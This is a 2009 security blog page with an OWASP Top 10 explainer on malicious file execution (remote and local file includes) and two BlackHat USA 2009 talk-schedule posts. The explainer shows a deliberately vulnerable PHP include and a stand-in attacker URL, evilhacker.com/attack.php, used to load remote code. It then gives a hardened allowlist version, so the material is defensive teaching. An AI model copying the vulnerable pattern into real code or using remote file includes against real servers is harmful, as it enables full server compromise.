Malicious File Execution

Posted by Brett Hardin on 8th July 2009

Reading time: 2 – 4 minutes

Photo: TCM Hitchhiker

This is the third part in a ten-part series describing the OWASP Top 10. (See all the OWASP Top 10)

What is Malicious File Execution

Some web applications allow the user to specify input that is used directly in file streams, or allow the user to upload files to the server. At a later time, the web application accesses the user-supplied input in the web application's own context. By doing this, the web application opens the possibility of malicious file execution.

When an application allows users to modify file streams, the application is trusting the user to operate within certain “rules” and may assume the user won’t break these rules.

If there are no preventive controls in place, an attacker can exploit those rules by attempting to include files stored on remote or local file systems.

Web applications that are vulnerable to malicious file execution break the simple security rule of never trusting user input.

Allowing malicious file execution to exist in a web application can lead to the complete compromise of the server.

Examples of Malicious File Execution

Typical examples of malicious file execution are remote file includes and local file includes. Most people think of these as PHP problems; however, that does not mean an ASP or JSP server isn’t susceptible to malicious file execution vulnerabilities.

Here is a common example. Imagine the PHP statement:

include $_REQUEST['filename'];

An attacker can then supply a file name that is a remote URL they control, say http://evilhacker.com/attack.php.

How Do You Prevent Malicious File Execution

Malicious file execution needs to be prevented from the design stage. If the design stage of the web application has already been completed, then extra precaution needs to be taken.

Developers need to pay particular attention to code access security mechanisms to ensure that file names supplied by or influenced by the user do not allow security controls to be bypassed.

Web applications should not allow users to insert input into a server-based resource. If the ability is needed, however, developers need to be extra cautious about what input they accept, and should ensure that file names supplied by the user do not allow security controls to be bypassed.

General preventions that can be taken include:

  • Strongly validating user input using an “accept only known good” approach.
  • Adding firewall rules that prevent the web server from making new outbound connections to external sites, which helps prevent remote file include vulnerabilities from being exploited.
  • Implementing a sandbox to isolate applications from one another.
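The include statement from the example above, placed beside a version hardened with the “accept only known good” rule from the list. This is an added example, not code from the original post; the pages directory, the page names and the `page` parameter are assumptions.

```php
<?php
// Added example (not from the original post): the vulnerable include from
// the post beside a hardened version that accepts only known-good names.

// VULNERABLE: the request parameter is used directly as the include path.
// The post's attack (?filename=http://evilhacker.com/attack.php) loads remote
// code when URL includes are enabled; local paths can still be included
// even when they are not.
function vulnerable_page(): void
{
    include $_REQUEST['filename'];
}

// HARDENED: the user never supplies a path at all. The parameter is a short
// key that is looked up in a fixed allowlist of files under one directory;
// anything not in the list is rejected. (Directory and names are assumed.)
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        return null;                       // not a known-good name: reject
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$key]);
    // Defence in depth: the resolved file must still live inside PAGE_DIR,
    // so a mistake in the allowlist cannot reach outside it.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function hardened_page(): void
{
    $key  = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
    $path = resolve_page($key);
    if ($path === null) {
        http_response_code(404);
        error_log('rejected page key: ' . $key); // log rejects for detection
        echo 'Page not found';
        return;
    }
    include $path;
}
```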

Depending on your environment, specific preventions can also be taken. For instance, with J2EE, developers should ensure that the security manager is enabled and properly configured. More information about environment-specific preventions can be found in OWASP’s full article on malicious file execution.


BlackHat USA 2009 – Day 2

Posted by Brett Hardin on 8th July 2009

Reading time: 4 – 6 minutes

Photo: Stephan Geyer

This is the second in a two-part series on BlackHat USA 2009. (Part 1)

As we stepped into the taxi the driver asked us, “Where To?”

“Caesar’s Palace.” I said.

“What are you guys in town for?” He said to the four of us in back seat of his cab.

“BlackHat.”

“You guys are the hackers?!”

“Yes, we are ‘the’ hackers.”

“I talked to some of you last year. They told me they could listen to my typing and blow up my computer! How are they able to do that?”

“They do that, using the Asparagus attack. As long as you don’t eat asparagus you will be fine.”

This is a conversation that a few of us had with a taxi driver last year while we were in Las Vegas attending BlackHat. If you happen to get this taxi driver, please explain the Asparagus Attack. He was full of questions regarding how it is done.

We are now on to Day 2. The hangover should be manageable enough to see the following talks:

Day 2 – Thursday – July 30th

[10:00am] Zane Lackey, Luis Miras

Attacking SMS

[~10:30am] Kevin Stadmeyer, Garrett Held

Worst of the Best of the Best

[11:15am] Jeremiah Grossman, Trey Ford

Mo’ Money Mo’ Problems: Making A LOT More Money on the Web the Black Hat Way

[1:45pm] Haroon Meer, Nick Arvanitis, Marco Slaviero

Clobbering the Cloud!

[~2:15pm] Tony Flick

Hacking the Smart Grid

[~3:45pm] Peter Guerra

How Economics and Information Security Affects Cyber Crime and What It Means in the Context of a Global Recession

[4:45pm] Panel Discussion

A Black Hat Vulnerability Risk Assessment


Blackhat USA 2009 – Day 1

Posted by Brett Hardin on 8th July 2009

Reading time: 3 – 5 minutes

Photo: Roadsidepictures

This is the first in a three-part series on BlackHat USA 2009. (part 2)

A dark cloud is about to approach Las Vegas. The city of sin will soon get cold sweats at night when they realize what is approaching. At the end of July, Las Vegas will be pounced upon by hundreds of security professionals at the annual BlackHat convention.

BlackHat is the most well-known computer and Internet security conference in the world. I always have a hard time deciding what talks to go see. I typically end up flagging way too many talks, and get burned out rather quickly. In addition, there are the security booze-hounds/gamblers who are very persuasive in swaying you away from the talks.

This year, I thought I would try something different. I am listing the talks I want to see on this blog in an attempt to make sure I show up to them. We will see if this happens.

Day 1 – Wednesday – July 29th

[10:00am] Rod Beckstrom

Beckstrom’s Law: A Model for Valuing Networks and Security

[11:15am] Nathan Hamiel, Shawn Moyer

Weaponizing the Web: More Attacks on User-Generated Content

[1:45pm] Nitesh Dhanjani

Recoverable Advanced Metering Infrastructure / Psychotronica

[3:15pm] Mark Dowd, Ryan Smith, David Dewey

The Language of Trust: Exploiting Trust Relationships in Active Content

[4:45pm] Thomas H. Ptacek, David Goldsmith, Jeremy Rauch

Hacking Capitalism ‘09: Vulnerabilities In Markets And Trading Platforms

[6:00pm] The Pwnie Awards
